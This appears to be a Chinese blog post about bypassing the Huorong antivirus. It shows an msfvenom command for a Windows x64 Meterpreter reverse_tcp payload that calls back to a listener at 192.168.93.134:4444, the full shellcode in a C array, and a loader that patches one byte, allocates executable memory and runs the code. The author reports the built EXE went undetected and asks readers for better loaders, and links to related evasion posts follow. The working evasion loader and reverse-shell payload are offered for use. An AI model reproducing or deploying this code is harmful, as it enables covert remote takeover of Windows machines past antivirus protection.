二进制免杀-火绒免杀研究

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.93.134 lport=4444 -f c

这里直接融合方舟的火绒免杀代码

#include <stdio.h>
#include <windows.h>
#include <iostream>
#include <string>
#include <stdlib.h>unsigned char myShellcode[] = {"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x4d\x31\xc9\x48\x0f"
"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x50\x44\x8b\x40\x20\x49\x01\xd0\x8b"
"\x48\x18\xe3\x56\x48\xff\xc9\x4d\x31\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x5d\x86\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5"
};void encrypt(char* buf) {char key = 0x1;buf[63] -= key;
}int main(int argc, char** argv) {encrypt((char*)myShellcode);void* exec = VirtualAlloc(0, sizeof(myShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);memcpy(exec, myShellcode, sizeof(myShellcode));((void(*)())exec)();return 0;
}

本地调试-火绒报毒说明只有运行的时候报毒

尝试生成解决方案-EXE

生成之后发现火绒并未主动检测（删除EXE）

到饭点了，先吃饭吧，有空在更新，有更好的加载器分享吗？

二进制免杀-火绒免杀研究相关推荐

Python免杀火绒、360和Defender
目录简介环境原理加载ShellCode 定位特征码 Base64编码绕过简介之前学习免杀都是使用Metasploit自带的编码进行,从未成功过.也使用过GitHub上别人提供的免杀方法,最 ...
新手指南手把手教你部署火绒企业杀毒
随着企业业务对网络的依赖不断加大,企业对于网络安全的重视程度也在不断提升,但近年来各种网络攻击可以说是屡禁不止,且大有愈演愈烈之势.木马病毒.安全漏洞.勒索软件等一个个耳熟能详的名词成为企业的&quo ...
红队培训班作业 | 免杀过360和火绒四种方法大对比
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...
红队培训班作业 | 五种免杀bypass火绒360姿势横向测评：哪款更适合你？
文章来源|MS08067 红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 一.远程线程注入 (一)通过MSF生成payload 通过msfven ...
Invoke-Obfuscation混淆免杀过360和火绒
微信公众号:乌鸦安全扫取二维码获取更多信息! 更新时间:2021-05-31 Invoke-Obfuscation下载地址:https://github.com/danielbohannon/Inv ...
Powershell 过火绒免杀上线
payload生成原生payload生成后被无情秒杀 powershell免杀制作打开powershell命令行,将payload编码 1.新建一个变量h,用来接收之后编码的payload $h= ...
作为站长，给火绒吹一次，论杀毒谁强？
现在杀毒软件非常多,个人用户用的比较多的无非是360.腾讯电脑管家和金山毒霸,早在以前,本人也是360的推崇者,什么电脑都要安装上360,也就是人们所说的全家桶,的确,360确实带给我不少的安全感,但 ...
360安全卫士、360杀毒与火绒
2019年以前,360安全卫士.360杀毒一直是我电脑里的主要杀毒软件.直到我听说了另一款杀毒软件:火绒. 于是我立刻下载安装了火绒.安装完之后,我就想卸载360安全卫士.可是360安全卫士提示: 我 ...
怎样找到ant压缩这个软件_彻底查杀广告软件！火绒，赞！
昨天下午,火绒的官方微博火绒安全实验室发布了一篇名为<火绒将彻底查杀广告软件首批包括50余款>的头条文章,在文章的开篇就指出对 50 余款恶意广告软件彻底查杀,评论区的朋友也是纷纷拍手称 ...

二进制免杀-火绒免杀研究

二进制免杀-火绒免杀研究相关推荐

最新文章

热门文章